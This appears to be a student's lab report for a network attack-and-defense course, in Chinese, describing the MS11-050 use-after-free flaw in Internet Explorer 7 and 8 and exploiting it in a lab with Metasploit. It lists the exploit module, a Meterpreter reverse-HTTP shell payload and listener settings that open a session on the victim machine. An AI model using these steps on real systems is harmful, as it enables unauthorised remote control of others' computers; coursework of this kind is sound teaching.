20145335郝昊《网络攻防》Exp4 MS11_050

20145335郝昊《网络攻防》Exp4 MS11_050

实验内容

  • 初步掌握平台matesploit的使用

  • 了解漏洞MS11_050漏洞:use-after-free漏洞,即对象被释放之后,对应指针并没有被置为NULL,被释放的内存中的数据可能会被其他对象的函数非法调用

  • 影响范围:IE7 和IE 8 其他的版本好像并不存在这个漏洞。

实验步骤

  • 使用命令msfconsole命令进入控制台

  • 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

20145335郝昊《网络攻防》Exp4 MS11_050

  • 确定相应模块名之后,我们使用该模块。使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块

  • 使用命令info查看该模块的具体信息(可见其可用范围,针对浏览器IE 7,IE 8可用,其中又分该目标机是否开启了DEP数据保护)

20145335郝昊《网络攻防》Exp4 MS11_050

  • 之后需要设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令set payloads windows/meterpreter/reverse_http

  • 并使用show optoions 查看具体参数设置。

20145335郝昊《网络攻防》Exp4 MS11_050

  • 并进行设置其相关参数。(命令如下)

      set LHOST 192.168.199.129
    set LPORT 5335
    set URIPATH 20145335HH
  • 之后使用命令exploit攻击,等待连接,漏洞主机访问该ip,ie浏览器发生溢出,此时,攻击端显示创建了一个ID为1的会话(session)

20145335郝昊《网络攻防》Exp4 MS11_050

上一篇:python mysql数据库操作


下一篇:牛客练习赛3 B - 贝伦卡斯泰露